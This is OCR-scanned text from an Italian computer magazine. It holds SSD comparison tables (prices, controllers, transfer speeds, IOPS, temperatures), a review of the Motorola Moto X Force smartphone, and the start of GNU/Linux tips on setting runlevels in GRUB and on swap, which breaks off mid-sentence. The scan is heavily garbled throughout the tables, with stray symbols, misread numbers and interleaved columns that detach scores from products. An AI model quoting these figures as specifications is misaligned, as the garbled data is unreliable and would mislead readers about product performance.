Accessori in dotazione 2,00%] nessun accessorio in dotazione adattatore per spessore 9,5 mm 4,00 | nessun accessorio in dotazione DO 
Programma in dotazione per trasferire i dati del PC allo SSD 3,00%] si,Samsung Data Migration Versione WE:X111}8 si, NTI Echo 3 perToshiba 3.0* 8,00 fu) 
301 


Quanto scalda lo SSD in funzione? 5,00% si scalda lievemente 8,56 siscalda lievemente 8,74. si scalda în misura minima 9,66 


Riscaldamento rispetto alla temperatura ambiente (in standby / a regime max.) [:1-(] molto basso (3° Celsius) / bas- 1 ZH 9,66 
basso (14° Celsius) so (12° Celsius) molto basso (5° Celsius) 


RISULTATI DELTEST IN DETTAGLIO KAAAKA AAAATAK AAAATA 


SAMSUNG TOSHIBA OT TRANSCEND — 
850 Pro (Q300 Pro SSD3708 
Prezzo: 214 Euro Prezzo: 223 Euro Prezzo: 181 Euro 


Capacità Memoria: 512 Gigabyte Capacità Memoria: 512 Gigabyte Capacità Memoria: 512 Gigabyte 

Connessione: SATA 6Gb/s Connessione: SATA 6Gb/s Connessione: SATA 6 Gb/s 

Controller: Samsung MEX (EXM01860) Controller: Toshiba TC58NC1000 (SAFM11.2) | Controller: TS6500 (00919A) 

Altezza / Peso: 7 mm / 52 grammi Altezza / Peso: 7 mm / 49 grammi Altezza / Peso: 7 mm / 45 grammi 
Con quale velocità è possibile copiare i file? 60,00% velocità elevatissima 9,06 velocità elevata 


Copia di grandi file Video (Lettura / Scrittura ) veloce (476,61 MB/s) / EI: veloce (467,47 MB/S) / EWF] veloce (473,96 MB/5) / 
veloce (477,05 MB/5) veloce (466,62 MB/5) veloce (431,24 MB/5) 


Copia piccoli file audio (Lettura / Scrittura ) 20,00%] veloce (415,97 MB/s) / veloce (415,97 MB/5) / t:4-Y veloce (420,07 MB/5) / 
velocissimo (502,11 MB/s) veloce (496,75 MB/s) veloce (437,68 MB/s) 


Velocità di trasferimento continuo (Lettura / Scrittura ) 20,00%] velocissimo (542,99 MB/s) / AU) velocissimo (528,33 MB/5) / ‘7.9 velocissimo (539,18 MB/s) / 8,96 
velocissimo (505,92 MB/s) velocissimo (493,42 MB/s) veloce (447,86 MB/5) 


Quale aumento di velocità procura I'SSD per l'avvio dei programmi? —30,00% awioulttraveloce 9,68 avvio ultraveloce 9,08. lettura veloce, scrittura più lenta 1,82 


Numero delle operazioni di lettura e scrittura al secondo (I0PS) 9,46 CHA] numerose (65.206) / 6,26 
numerosissime (44.291) numerose (39.857) poche (22.705) 

cli . : È 
velocissimo (0,047 ms) molto veloce (0,058 ms) velocissimo (0,099) 


Semplicità di messa in funzione? 5,00% include software, no accessori | 480| include software e adattatore | 640] sono presenti software e supporto 
Accessori in dotazione I nessun accessorio in dotazione adattatore per spessore 9,5 mm 4,00 | 1 supporto per disco da 3,5 pollicie ‘5,00 
viti 


Programma in dotazione per trasferire i dati del PC allo SSD 3,00%] si,Samsung Data Migration Versione WE:X\ NN si, NTI Echo 3 perToshiba 3.0* [:X111AY si, SSD Scop (Transcend SSD System MRR:X11) 
3.0! Clone)! 


Quanto scalda lo SSD in funzione? 5,00% si scalda lievemente 8,46 si scalda lievemente 8,24. si scalda lievemente 8,84 


a A Nice ere” Mi 
basso (14° Celsius) basso (12° Celsius) basso (12° Celsius) 


RISULTATI DELTEST IN DETTAGLIO KXAKkakk KXAKAKAk XAAAAK 
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ZOTAC CORSAIR ADATA SANDISK 
Premium SATA Ill Force LX Premier SP550 X400 
Prezzo: 102 Euro Prezzo: 129 Euro Prezzo: 80 Euro Prezzo: 97 Euro 


Capacità Memoria: 256 Gigabyte 
Connessione: SATA 6 Gb/s 
Controller: SM2246EN (N0530C) 
Altezza / Peso: 7 mm / 49 grammi 


velocità di scrittura un po' lenta 


[X:[:Nj veloce (462,40 MB/S) / 
un po' lento (284,38 MB/s) 


Capacità Memoria: 240 Gigabyte 
Connessione: SATA 6Gb(s 
Controller: Phison 3110 (SAFM01.6) 
Altezza / Peso: 7 mm / 58 grammi 


velocità elevatissima | 902 


Capacità Memoria: 240 Gigabyte 
Connessione: SATA 6Gb/s 
Controller: SMI (00803B5a) 


Altezza / Peso: 7 mm / 52 grammi 


(X::] velocità di scrittura lenta 
6,68 | veloce (455,41 MB/5) / 
molto lento (147,98 MB/s) 


Capacità Memoria: 256 Gigabyte 
Connessione: SATA 6Gb/s 


Controller: Marvell 8851074 (X4120000) 


Altezza / Peso: 7 mm / 38 grammi 


4,60 | veloce (466,62 MB/s) / 
un po' lento (284,06 MB/s) 


cru” 
BX200 


Prezzo: 70 Euro 


Capacità Memoria: 240 Gigabyte 
Connessione: SATA 6Gb/s 
Controller: SM22565 (MU01.6) 
Altezza / Peso: 7 mm / 43 grammi 


MES] velocità di scrittura un po' lenta MEX] velocità di scrittura molto lenta | 552] 


6,72 | veloce (455,41 MB/s) / 4,60 
molto lento (95,20 MB/s) 


veloce (476,17 MB/s) / 

velocissimo (486,11 MB/s) 

veloce (407,69 MB/s) / [:X.4} veloce(420,42 MB/s) / 
veloce (480,42 MB/s) un po’ lento (283,62 MB/s) 


6,38 | veloce (400,35 MB/S) / 
un pò lento (145,94 MB/s) 


molto veloce (541,26 MB/s) / mol- (REX) molto veloce (512,79 MB/s) / 

to veloce (509,91 MB/s) un po' lento (288,66 MB/s) 
l'avvio dei programmi è lento -—IIGI} lettura dati veloce, scrittura lenta 
un po’ poche (44.219) / 
poche (16.812) 

molto veloce (0,146 ms) / 


6,9 | molto veloce (540,08 Mb/s) / 
un po' lento (346,65 MB/s) 
7,28 lettura veloce, scrittura più lenta 


4,60 | numerose (66.017) / 5,74 | numerose (76.626) / 
poche (17.421) poche (16.238) 


4,22 | veloce (383,26 MB/5) / 
un po’ lento (282,37 MB/s) 
té) molto veloce (525,38 MB/s) / 
un po' lento (324,99 MB/s) 


| 7,62 avvio programmi non velocissimo |_5,86| risposta lenta per scrittura dati 


6,14 | un po' poche (42.097) / 
pochissime (10.194) 


RI veloce (0,169 ms) / 
Paso ne (0,204 ms) 


- E 
veloce (0,120 ms) veloce (0, 123 ms) veloce (0,123 ms) 


DE solo le viti SE mancano tutti gli accessori Bio include software e adattatore mancano tutti gli accessori 


6,10 | veloce (410,3 MB/s) / 4,28 
molto lento (95,26 Mb/s) 

7/17} molto veloce (538,26 MB/s) / 7,68 
un po’ lento (334,68 MB/s) 

3,78 | unpo'poche (58.624) / 
pochissime (9528) 

Tà:7.% veloce (0,202 ms) / 

un po’ lenta (0,224 ms) 

(1000) _ include software e adattatore 

AE per spessore 9,5 mm 


nessun accessorio in dotazione adattatore per spessore 9,5 mm sai ,00 | nessun accessorio in dotazione 
si,Acronis True Image HD! A] no 


si scalda lievemente | 8,50 tendeascaldarsi molto poco (19,22! tende a scaldarsi molto poco | 9,24 si scalda lievemente 


FS T)} molto basso (1° Celsius) / motto basso (2° Celsius) / 
basso (12° Celsius) 


basso (10° Celsius) 


ADATA 
Premier SP550 
Prezzo: 144 Euro 


Capacità Memoria: 480 Gigabyte 
Connessione: SATA 6Gb(s 
Controller: SMI (00803852) 
Altezza / Peso: 7 mm / 51 grammi 
velocità elevata 

veloce (467,47 MB/s) / 

veloce (412,14 MB/s) 

veloce (407,04 MB/s) / 

veloce (419,04 MB/s) 

molto veloce (532,65-MB/5) / 
veloce (475,28 MB/s) 

lettura dati veloce, scrittura lenta 
numerose (72.748) / 

poche (21.576) 

veloce (0,180 ms) / 

molto veloce (0,103 ms) 

con software e adattatore 
adattatore per spessore 9,5 mm 


| 7,62 
6,52 


4,00 


KINGSTON 
SSDNow KC400 
Prezzo: 203 Euro 


Capacità Memoria: 512 Gigabyte 
Connessione: SATA 6 Gb/s 


Controller: Phison 3110 (SAFMOO.W) 
Altezza / Peso: 7 mm / 57 grammi 


{18,40 SSD da 512GB più veloce nel test | 


lettura dati veloce, scrittura lenta 


RZ] mancano tutti gli accessori 


nessun accessorio in dotazione 


Prezzo: 132 Euro 


Capacità Memoria: 480 Gigabyte 
Connessione: SATA 6Gb/s 

Controller: Phison S10 Series (SAFM12.2) 
Altezza / Peso: 7 mm / 46 grammi 


9,10 velocità elevata 


basso (11° Celsius) 


si,Acronis True Image HD! 


| 898 si scalda lievemente 


molto basso (4° Celsius) / 
basso (13° Celsius) 


CRUCIAL 

BX200 

Prezzo: 130 Euro 
Capacità Memoria: 480 Gigabyte 


Connessione: SATA 6Gb/s 
Controller: SM2256 (MUO1.6) 


Altezza / Peso: 7 mm / 54 grammi 
| 872. velocità elevata 


7,06 avvio programmi non velocissimo DE avvio programmi non velocissimo 


un po” poche (51.069) / 5,26 | un po' poche (54.612) / 

poche (19.886) poche (17.016) 

"ESSI > ES 
veloce (0,107ms) veloce (0,123 ms) 


(10,00! mancano tutti gli accessori 


nessun accessorio in dotazione 


si, Acronis True Image HD* 


si scalda lievemente 
molto basso (2° Celsius) / 
basso (13° Celsius) 


KAFKA 


8,70. siscalda lievemente 
t:4(]} molto basso (3° Celsius) / | 834 eta peooe RISI FI] molto basso (3° Celsius) / un po” 1 f(:7) molto basso (3° Celsius) / 7,76 
basso (15° Celsius) basso (12° Celsius) elevato (20° Celsius) un po' elevato (20° Celsius) 


KAKAK 


no 


| 834. si scalda lievemente 


KAAAKXK 


numerose (61.988) / 
poche (15.867) 


SANDISK 
X400 
Prezzo: 148 Euro 


Capacità Memoria: 512 Gigabyte 
Connessione: SATA 6Gb/s 

Controller: Marvell 88951074 (X4120000) 
Altezza / Peso: 7 mm / 37 grammi 


Î 7,88. velocità elevata 


| se 
FETA) veloce (476,61 MB/S) / FIT veloce (477,5 MB/5) / [2] veloce (464,08 MB) / FA) veloce (456,22 MB/5) / 
veloce (482,45 MB/s) veloce (470,91 MB/s) un po' ento (366,41 MB/5) veloce (477.50 MB/s) 
FR:i)} veloce(400,04 MB/3) / FIG) veloce (411,96 MB/5) / ERA] veloce (404,79 MB/5) / FRA veloce (379,28 MB/5) / 
molto veloce (511,65 MB/s) veloce (414,29 MB/s) un po lento (366,77 MB/s) motto veloce (499,66 Mb/5) 
[EI molto veloce (524,95 MB/5) / mol- (RISX5-NI molto veloce (543,92 Mb/s) / mol (MEX::1 molto veloce (526,04 MB/5) / FI). molto veloce (513,52 MB/5) / 8,76 
to veloce (520,80 MB/s) to veloce (505,62 MB/s) veloce (433,88 MB/s) veloce (454,93 MB/s) 


W::2] avo programmi non velocissimo | 618] 
5,36 | un po' poche (43.039) / 
pochissime (11.999) 


LLC) veloce (0,193 ms) / 


veloce (0,132 ms) 


(10,00! con software e adattatore 


adattatore per spessore 9,5mm 


LIZA] veloce (0,155 ms) / 
veloce (0,174 ms) 


MZ] mancano tutti gli accessori 
4,00 | nessun accessorio in dotazione 


si,Acronis True Image HD! 


| 896 si scalda lievemente 


KAAAAK 


7,66 siscalda lievemente 7,76 


KAAAK 


TAT N 
LIA 


I RISUL BREVE 


Con quale velocità è possibile copiare i file? 
Copia di grandi file Video (Lettura / Scrittura ) 


Ve = 


E ò " 

KINGSTON CRUCIAL CRUCIAL 

Hyper X Savage BX200 

Prezzo: 370 Euro pa 325 Euro Prezzo: 279 Euro 


Capacità Memoria: 960 Gigabyte 
Connessione: SATA 6 Gb/s 
Controller: SM2256 (MU01.6) 
Altezza / Peso: 7 mm / 58 grammi 


velocità elevata 


veloce (467,04 MB/s) / 
veloce (447,06 MB/s) 


Capacità Memoria: 1000 Gigabyte 
Connessione: SATA 6Gb/s 

Controller: Marvell 88559189 (MUO3) 
Altezza / Peso: 7 mm / 54 grammi 


velocità elevata 


veloce (458,26 MB/5) / 
veloce (465,34 MB/) 


Capacità Memoria: 960 Gigabyte 
Connessione: SATA 6Gb/s 

Controller: Phison PS3110-510 (SAFMOO.r) 
Altezza / Peso: 7 mm / 94 grammi 


60,00% I’SSD da 960GB più veloce nel test 


veloce (476,61 MB/) / 
veloce (472,21 MB/s) 


Copia piccoli file audio (Lettura / Scrittura ) 


veloce (406,72 MB/5) / 
veloce (470,27 MB/s) 


veloce (401,92 MB/s) / 


20,00%] veloce (403,19 MB/s) / 
molto veloce (489,62 MB/s) 


velocissimo (492,92 MB/s) 


Velocità di trasferimento continuo (Lettura / Scrittura ) 


Quale aumento di velocità procura I'SSD per l'avvio dei programmi? 
Numero delle operazioni di lettura e scrittura al secondo (IOPS) 


velocissimo (537,89 MB/s) / 
veloce (463,56 MB/s) 


lettura veloce, scrittura più lenta 
numerose (61.358) / 
un po' poche (25.249) 


velocissimo (503,65 MB/s) / 
velocissimo (486,25 MB/s) 


lettura veloce, scrittura più lenta 


un po poche (47.593) / 
poche (22.536) 


20,00%| velocissimo (541,12 MB/S) / 
velocissimo (503,34 MB/S) 


30,00% lettura veloce, scrittura più lenta 
15,00%] un po’ poche (54.098) / 
poche (16.724) 


Velocità media per accesso ai dati (Lettura / Scrittura in Millisecondi) 


Semplicità di messa in funzione? 
Accessori in dotazione 


molto veloce (0,147 ms) / 
veloce (0,106 ms) 


include software e adattatore 
adattatore per spessore 9,5 mm 


veloce (0,183 ms) / 
velocissimo (0,086 ms) 


| 640] con software, no accessori 
4,00 | nessun accessorio in dotazione 


15,00%] velocissimo (0,134 ms) / 
veloce (0,120 ms) 


5,00% consoftware e accessori 
2,00%| due adattatori ', viti 


Programma in dotazione per trasferire i dati del PC allo SSD 


Quanto scalda lo SSD in funzione? 


Riscaldamento rispetto alla temperatura ambiente (in standby /a regime max.) 


RISULTATI DEL TEST IN DETTAGLIO 


Con quale velocità è possibile copiare i file? 
Copia di grandi file Video (Lettura / Scrittura ) 


Copia piccoli file audio (Lettura / Scrittura ) 


3,00%| si,Acronis True Image HD' si,Acronis True Image HD! 1:A111]}f si, Acronis True Image HD! 


si scalda lievemente 7,94 si scalda lievemente 
::7.8 molto basso (4° Celsius) / 


{79 molto basso (3° Celsius) / 7,92 
un po' elevato (17° Celsius) un po’ elevato (18° Celsius) 


KAKAA AAKAAK 


5,00% si scalda lievemente 
molto basso (4° Celsius) / 
un po’ elevato (17° Celsius) 


KAKA 


TRANSCEND 
MTS400 M.2 
Prezzo: 262 Euro 


Capacità Memoria: 512 Gigabyte 
Connessione: M.2 2242 / SATA 6 Gb/s 
Controller: Transcend TS6500 (009194) 


KINGSTON 

SSDNow M.2 G2 

Prezzo: 177 Euro 

Capacità Memoria: 480 Gigabyte 
Connessione: M.2. 2280 / SATA 6Gb/s 
Controller: Phison PS3100 (SAFMO1.R) 


SAMSUNG SSD 
850 Evo M.2 


Prezzo: 170 Euro 


Capacità Memoria: 500 Gigabyte 

Connessione: M.2.2280 / SATA 6Gb/s 
Controller: Samsung MGX (EMT21B60) 
Lunghezza / Peso: 80 mm / 8 grammi Lunghezza / Peso: 80 mm / 8 grammi Lunghezza / Peso: 42 mm / 4 grammi 


60,00% l'SSD M.2 più veloce del test 898! velocequantoil vincitore deltest È (1,52! velocità elevata 
20,00%| veloce (459,08 MB/5) / CRA, veloce (467,90 MB/5) / FEST] veloce (464,50 MB/$) / 
veloce (473,09 MB/5) veloce (477,50 MB/5) veloce (439,76 MB/5) 

20,00%]. veloce (408,89 MB/5) / [XA] veloce (399,73 MB/5) / FEE) veloce (412,62 MB/S) / 
veloce (484,52 MB/S) veloce (445,69 MB/5) 


Velocità di trasferimento continuo (Lettura / Scrittura ) 


Quale aumento di velocità procura I'SSD per l'avvio dei programmi? 
Numero delle operazioni di lettura e scrittura al secondo (IOPS) 


velocissimo (498,68 MB/s) 
LA: 1)j velocissimo (530,92 MB/s) / I Aj velocissimo (538,09 MB/s) / 8,98 
velocissimo (516,67 MB/s) 


20,00%| velocissimo (530,14 MB/5) / (45197 MB/9) 
veloce (451, S 
8,26 lettura veloce, scrittura più lenta 


velocissimo (511,17 MB/s) 
2,37 letturaveloce, scrittura più lenta 7,84 
6,92 | un po' poche (55.268) / 
poche (20.447) 


Velocità media per accesso ai dati (Lettura / Scrittura in Millisecondi) 


Semplicità di messa in funzione? 


15,00%] numerose (63.739) / 
poche (22.669) 
velocissimo (0,071 ms) molto veloce (0,103 ms) 


30,00% lettura veloce, scrittura più lenta 
3,23 | numerose (65.818) / 
un po' poche (29.384) 
15,00%| velocissimo (0,122 ms) / 1::7} veloce (0,154 ms) / 3 &:(1Nj velocissimo (0,118 ms) / 
velocissimo (0,099 ms) 
5,00% consoftware, mancano accessori mancano tutti gli accessori 


{6/00} mancano tutti gli accessori 


nessun accessorio in dotazione 


no 


Accessori in dotazione 2,00%] nessun accessorio in dotazione [1] nessun accessorio in dotazione 6,00 
Programma in dotazione per trasferire i dati del PC allo SSD 3,00%| si, Samsung Data Migration Software (RE:X:11} no ) 
Versione 3.0! 


Quanto scalda lo SSD in funzione? 
Riscaldamento rispetto alla temperatura ambiente (in standby / a regime max.) 


RISULTATI DEL TEST IN DETTAGLIO 


5,00% siscalda solo in esercizio molto caldo solo in esercizio si scalda solo in esercizio 


5,00%] hasso (13° Celsius) / 5,04 | basso (10° Celsius) / 3,57 | unpo'elevato (14° Celsius) / 5,88 
elevato (31° Celsius) molto elevato (37° Celsius) elevato (24° Celsius) 


AAKAK KAAKAK KAAAKAAK 


KINGSTON TRANSCEND | TOSHIBA SANDISK SANDISK 


SSDNow KC400 0300 Ultra Il 
Prezzo: 397 Euro DR A Euro Prezzo: 308 Euro Prezzo: 257 Euro ne, 280 Euro 


Capacità Memoria: 1000 Gigabyte i 1 ità ” Capacità Memoria: 1000 Gigabyte 
Connessione: SATA 6Gb(s /! Connessione: SATA 6Gb/s 
Controller: Phison 3110 (SAFMOO.W) n Controller: Toshiba TC58NC1000 (SAFM11.2) | Controller: Marvell 88599189 (X31200RL) | Controller: Marvell 88591074 (X4120000) 
Altezza / Peso: 7 mm / 57 grammi Altezza / Peso: 7 mm / 46 grammi Altezza / Peso: 7 mm / 48 grammi Altezza / Peso: 7 mm / 57 grammi Altezza / Peso: 7 mm / 60 grammi 
I'SSD da 1TB più veloce nel test 8,98 velocità elevata à 8,72. velocità elevata 
veloce (477,05 MB/s) / [:X:(N} veloce (468,32 MB/s) / #2: veloce (476,61 MB/5) / [EC  veloce (475,72 MB/s) / [:-(j veloce (457,44 MB/s) / 
veloce (468,75 MB/s) veloce (424,09 MB/s) veloce (473,96MB/s) veloce (447,06 MB/s) veloce (472,21 MB/s) 
veloce (399,1 MB/s) / [:4-YI veloce(421,11 MB/s) / veloce (404,47 MB/s) / [KM] veloce (388,79 MB/s) / [1] veloce (378,72 MB/s) / 
molto veloce (496,75 MB/s) veloce (414,96 MB/s) veloce (475,51 MB/s) veloce (469,4 MB/5) veloce (458,47 Mb/s) 
molto veloce (539,34 MB/s) / mol- f:X8î molto veloce (518,2 MB/5) / molto veloce (541,52 Mb/s) / [::7.M molto veloce (532,96 MB/s) / [7 molto veloce (520,41 MB/5) / 
to veloce (508,47 MB/s) veloce (428,45 MB/s) veloce (449,01 MB/s) veloce (472,37 MB/5) veloce (478,4 MB/s) 
lettura veloce, scrittura più lenta ‘7,12 lettura veloce, scrittura più lenta (7,46 avvio programmi non velocissimo BIG} avvio programmi non velocissimo [ICEZY avvio programmi non velocissimo 
un po’ poche (51.684) / 5,38 | numerose (66.038) / un po' poche (54.031) / 4,72 | un po’ poche (52.403) / 4,98 | unpo'poche (41.728) / 
poche (20.680) poche (20.736) pochissime (13.484) poche (16.660) , 
veloce (0,163 ms) / LX: veloce (0,165 ms) / veloce (0,177 ms) / , , 
veloce (0,106 ms) veloce (0,111 ms) veloce (0,156 ms) , (0,160 
mancano tutti gli accessori 000. con software e supporto con software e adattatore 
nessun accessorio in dotazione 11} 1 supporto per disco da 3,5 pollici + ,00 | adattatore per spessore 9,5 mm 4,00 | adattatore per spessore 9,5mm 4,00 | nessun accessorio in dotazione 
viti 


no si, SSD Scope (Transcend SSD SY- Xii} si, NT Echo 3 perToshiba 3.0? 
stem Clone)? 


si scalda lievemente 8,84. siscalda lievemente si scalda lievemente 8,02 siscalda lievemente 8,46 siscalda lievemente 
molto basso (2° Celsius) / t:%:7 94 molto basso (3° Celsius) / TA: molto basso (1° Celsius) / [:X1Y-j molto basso (3° Celsius) / 8,46 ela (uao (3° Celsius) / 
basso (12° Celsius) - un po' elevato (19° Celsius) un po' elevato (19° Celsius) basso (14° Celsius) Celsius) 


KAKAA AAKAAX KAAKA KAAAA AKAAAA 


SANDISK KIN STON SAMSUNG I . 
X400 Hyper X Predator M.2 G2 950 PRO M.2 SSD 750 Series 1.2 TB 
Prezzo: 150 Euro Prezzo: 189 Euro Prezzo: 207 Euro Prezzo: 311 Euro Prezzo: 1.553 Euro 

Capacità Memoria: 512 Gigabyte Capacità Memoria: 240 Gigabyte Capacità Memoria: 256 Gigabyte Capacità Memoria: 512 Gigabyte Capacità Memoria: 1200 Gigabyte 

Connessione: M.2 2280 / SATA 6Gb(s Connessione: M.2 2280 / PCle 2,0x4 Connessione: M.2 2280 / PCle 2.0x2 Connessione: M.2 2280 / PCle 3.0x4 Connessione: PCle 3.0 x4 scheda plug-in 

Controller: Marvell 88551074 (X4120000) | Controller: Marvell 88559293 (OC34L5TM) | Controller: Marvell 88999183 (1.05) Controller: Samsung UBX (180QBXX7) Controller: Intel CH29AE41ABO 

Lunghezza / Peso: 80 mm / 7 grammi Lunghezza / Peso: 80 mm / 10 grammi Lunghezza / Peso: 80 mm / 10 grammi mr ra Lunghezza / Peso: 166 mm / 232 grammi 
ità velocità elevata 7,46 unpo'più lento in scrittura MEZ] velocità elevata velocità elevata 8,00 

veloce (463,24 MB/5) / molto veloce (969,47 MB/s) / [:# (1) veloce (815,09 MB/s) / tf molto veloce (1414,03 MB/s) / - x:iN) molto veloce (1343,51 MB/s) / ve- MR:XS:] 

veloce (474,4 MB/s) veloce (650,42 MB/s) un po’ lento (537,69 MB/s) molto veloce (1312,51 MB/s) loce (1158,1 MB/s) 

veloce (374,29 MB/s) / veloce (648,48 MB/5) / t£17 un po' lento (545,47 MB/s) / 6,12 | veloce (1035,73 MB/5) / veloce (944,00 MB/s) / 7,84 

molto veloce (498,20 MB/5) un po' lento (639,56 MB/s) un po’ lento (546,05 MB/s) veloce (1152,36 MB/s) veloce (1176,2 Mb/s) 


molto veloce (515,13 MB/5) / ::7.(]} molto veloce (1343,64 MB/s) / un (#4 un po' lento (706,55 Mb/s) / 3 molto veloce (2338,07 MB/s) / ve- MR:#41]I veloce (2136,08 MB/s) / 7,48 
veloce (421,22 MB/s) po'lento (669,81 MB/s) un po’ lento (561,47 MB/s) loce (1196,09 MB/s) un po' lento (478,4 MB/s) 


lettura veloce, scrittura più lenta QST] lettura molto veloce, scrittura lenta (_ 7474 ittura più avvio programmi velocissimo 10,00 


un po' poche (41.651) / numerosissime (101.934) / numerose (66.460) / numerosissime (174.298) / } (X.\}} numerosissime (160.269) / 10,00 
pochissime (12.137) poche (13.745) un po' poche (31.823) numerosissime (72.003) numerosissime (85.317) 


veloce (0,154 ms) / molto veloce (0,112 ms) / molto veloce (0,127 ms) / X-{:7} molto veloce (0,082 ms) / 3 (1Xi]1]} molto veloce (0,099 ms) / 10,00 
veloce (0,171 ms) veloce (0,155 ms) molto veloce (0,070 ms) molto veloce (0,029 ms) KE] enatan (0,029 ms) 


mancano gli accessori --- con software, accessori mancano gli accessori | include software, no accessori manca il software 


nessun accessorio in dotazione nessun accessorio in dotazione nessun accessorio in dotazione f nessun accessorio in dotazione Lio IE per slot piatte 
si,Acronis True Image HD? 8,00 Mo) si, I Data Migration Software f:*1j no 


si scalda moltissimo in esercizio [ai si scalda moltissimo ssi or i scalda moltissimo REX] siscalta solo in esercizio 
elevato (23° Celsius) / | FRATI elevato (27° Celsius) / un po Tie DA basse (3 Cs / 
molto elevato (41° Celsius) molto elevato (58° Celsius) molto elevato (43° Celsius) MINI ievato (36° elevato (29° Celsius) 


KAKAA KAKAAA Kx* cr KAAHTA 


Ha rd w ar e 


Il telefonino indistruttibile . 


Fotocamera di prima classe, batteria notevole e display infrangibile: 
con il Moto X Force Motorola si congeda dal mercato con dignità? 


temente a disagio, visto che ormai lo usiamo per lavo- 

rare, comunicare con gli amici, svagarci e informarci. 
Peggio ancora se il telefono non funziona, ad esempio a causa 
di una rottura del display, visto che spesso custodie in silicone 
‘e borse servono a ben poco contro gli urti. Stavolta abbiamo 
voluto provare uno smartphone a prova di rottura: il Moto X 
Force. Lenovo ha annunciato di voler abbandonare il marchio 
Motorola: sarà questo l’ultimo prodotto venduto con il tradizio- 
nale marchio made in USA? 


S: dimentichiamo lo smartphone a casa ci sentiamo for- 


SCHERMO RESISTENTE A TUTTO 


Cinque strati extra di materiale garantiscono che il display del 
Moto X Force possa funzionare anche dopo una caduta. Mo- 
torola ne è così convinta che offre quattro anni di garanzia sui 
danni non intenzionali al display. | nostri esperti lo hanno pro- 
vato ed effettivamente il test è stato superato: dopo una ca- 
duta da cinque metri d’altezza il Moto X Force funzionava cor- 
rettamente. Meno resistente si è rivelato il case in metallo, che 
ha riportato qualche graffio, anche se per scoprirlo abbiamo 
dovuto osservarlo per bene. Tanto bene il display del moto X 
Force si è comportato sul campo, tanto sensibile si è mostra- 
to in laboratorio: è bastata una pressione anche minima del 
diamante usato per i test per causare graffi, e dopo un urto da 
altezza contenuta.con il bordo di un tavolo, sul display erano 
visibili alcune tracce. 


NON SOLO DISPLAY 


Sarebbe ingiusto giudicare il Moto X Force solo per la sua robu- 
stezza. Il display AMOLED da 5,4”, ad esempio, è brillante, ha 
una risoluzione di 2.560x1.440 pixel e grazie all’elevato contra- 
sto guardarvi delle foto o dei video è un vero piacere. A causa 
della luminosità non elevata, il display soffre la luce diretta del 
sole, diventando meno visibile: Il Force si tiene bene in mano, 
ma con i suoi 171 grammi è uno dei più pesanti in questa fascia. 
In compenso i 3 GB di RAM e il processore Qualcomm ad 8 
core (Snapdragon 810 con 4 core da 1,5 e 4 da 2,0 GHz) fanno 
girare fluidamente Android 5.1, in attesa del futuro aggiorna- 
mento ad Android 6.0. La batteria da 3550 mAh (ma secondo 
Motorola è da 3700 mAN) ci fa arrivare a fine giornata. 


FOTOCAMERA DA 21 MEGAPIXEL 


Uno dei punti di forza del Moto X Force è la sua fotocamera 
da 21 Mpixel, che ha tempi di scatto veloci e cattura immagini 
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dettagliate e ricche di colori, soprattutto con luce diurna. Pec- 
cato manchi uno stabilizzatore ottico d'immagine, che avrebbe 
sicuramente migliorato i risultati delle foto scattate con scarsa 
luce, le quali presentano leggere sfocature e rumore. 


LO METTO NEL CARRELLO? 


Il Moto X Force è un valido smartphone di fascia premium, 
con prestazioni elevate, un’ottima batteria e un’eccellente fo- 
tocamera. Il suo punto di forza è lo schermo AMOLED brillan- 
te e quasi indistruttibile grazie ad uno speciale rivestimento. 
È una innovazione, anche se tardiva, che fa lievitare il costo 
a ben 700 euro. 


9 Tips & Tricks. 


E Trucchi e consigli per usare subito GNU/Linux come un esperto, trovare 
soluzioni rapide ai problemi e sfruttare appieno le potenzialità del sistema 


LEGENDA GRUB:IMPOSTIAMO 
Eos DIVEROGTORT 

‘eg, | sistemi GNU/Linux utilizza- 
O: no il concetto di runlevel per 
indicare dei livelli di funzionalità spe- 
cifici, come la modalità multiutente 
grafica oppure lo stadio di riavvio o 
arresto del PC. In linea di massima, 
dopo aver definito in fase di installa- 
zione quale livello usare, scegliendo 
tra i due più diffusi come il 3 e il 5 
(multi-utente con tutte le funzionalità 
abilitate rispettivamente in modalità 
testo o in modalità grafica), il primo 
tipico in ambiente server mentre il se- 
condo è scelta obbligata per i sistemi 
desktop, l'utente comune non avrà 
più necessità di interessarsi della 
loro presenza. Esistono però parec- 
chi scenari in cui potrebbe essere 
necessario impostarne temporanea- 
. mente uno differente in fase di avvio, 
‘come ad esempio, solo per citare al- 
cune casistiche, qualora per qualche 


ATE 
Ejmuurmeon 
= 


Da 
EM scurezza 
ÙU%® 


SISTEMA 


SI SVILUPPO 


GNU GRUB versione 2.02"beta2-22 


tform_search_hint = x. 


fs-uuid --set=r 


D=9df a64b0-f 


N Fig.1* Conl'editor di GRUB si può facilmente definire 
il runlevel da usare temporaneamente per effettuare 
manutenzioni straordinarie 


oese 
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problema al sistema grafico non si 
riesca ad accedere al desktop. Op- 
pure, per eseguire manutenzioni 
straordinarie della propria macchina. 
In questi casi, la selezione del livello 
di avvio può essere impostata diret- 
tamente dal boot loader. Con Grub 2 
la procedura è semplicissima. Infatti, 
dal menu di caricamento iniziale ba- 
sta individuare la linea che indica il 
sistema che si vuole caricare (in ge- 
nere, si agisce su quello di default 
che poi è quello evidenziato automa- 
ticamente) e premere il tasto e per 
entrare in modalità di modifica. A 
questo punto si deve solo individuare 
la riga dove appare l'immagine del 
kernel da caricare (solitamente al suo 
interno il nome è presente il testo 
“vmlinuz-” seguito dai numeri della 
versione) e aggiungere al fondo della 
stessa il numero che indica il livello 
da usare. Infine, premiamo F10 per 
procedere con il caricamento. Ad 
esempio, inserendo 1 si attiverà la 
modalità singolo utente per manu- 
tenzioni straordinarie, dove verranno 
eseguiti pochissimi programmi e 
solo l'amministratore potrà accedere 
al sistema. Ovviamente, tali modifi- 
che sono solo temporanee: pertanto, 
una volta ultimato il lavoro nel runle- 
vel scelto, al successivo riavvio, tutto 
tornerà come in precedenza. 


CHI UTILIZZA LA 
MEMORIA DI SWAP? 
Quasi tutti i sistemi GNU/Li- 
Fo, nux usano almeno una parti- 


zione o un file di swap per espandere 


la propria capacità di memoria e que- 


sto indipendentemente dalla quantità 
di RAM installata. L'utilizzo di questa 


memoria, che come si intuisce dalla 
traduzione (scambiare) serve solo per 
parcheggiare momentaneamente dei 
dati per poi riportarli in RAM quando 
necessari: rallenta un po' le presta- 
zioni del sistema, ma almeno garanti- 
sce il corretto funzionamento dello 
stesso anche quando l'esecuzione di 
più programmi in contemporanea ec- 
cede alle risorse fisicamente disponi- 
bili. Per conoscere la dimensione e 
l'utilizzo della Memoria di swap, oltre 
